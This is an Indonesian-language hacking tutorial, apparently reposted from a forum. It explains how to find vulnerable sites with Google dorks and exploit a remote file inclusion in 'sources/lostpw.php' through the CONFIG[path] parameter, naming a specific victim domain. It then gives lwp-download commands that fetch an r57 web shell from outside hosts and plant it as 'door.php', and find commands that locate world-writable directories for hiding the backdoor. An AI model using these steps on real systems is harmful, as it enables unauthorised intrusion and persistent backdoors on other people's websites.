pertama2 kita buka google.com
kita memasuk kan keyword nya di sana...
keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di millw0rm.com cari sendiri yg laen]
Kita mulai saja!
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay
allinurl:index.php?a=display
allinurl <=- mencari setiap kata pada url...
index.php?a=display
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
http://www.historywebsites.com//index.php?a=display <=- tampil pada google..
http://www.historywebsites.com// <=- victim domain
index.php?a=display <=- DORK... kata kunci pada google...
http://www.historywebsites.com/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?
injektor nya ada di link..
Quote: |
http://www.geocities.com/yogya_hack/becak.tar.gz |
Quote: |
http://evilarmy.hostcentric.com/becak.tar.gz |
itu adalah r57
hmm....
kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...
cara nya ..
lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia
jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx
find . -type d -perm 777
cari dari direktori skr sebuah direktori lain yang bisa di tlis...
find . -type f -perm 777 <=- mencari file
find / -type d -perm 777 <=- mencari dari direktori / (root)
Quote: |
Backdoor PHP 1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz 2. mv becak.tar.gz door.php Contoh Hasil Site backdoor: http://www.target.com/[path]/door.php |
okeh...
sekian dl..
sector clear!!
Thanks Goes To:
ZeTH a.k.a s3t4n [Big thanks for finding the bugs!]
^MoNgOnDoW^ [Big thanks for lending the room!]
YF Xcode Big Famz! [thanks for support!]
^F_C^ [you know me!]
and all crewz!
#Becak & B-H-T crewz Vaksin13 OoN_BoY [makes me smile all the time!]
Salam Hangat
Jack-
diambil dari http://www.yogyafree.net/forum2
Tidak ada komentar:
Posting Komentar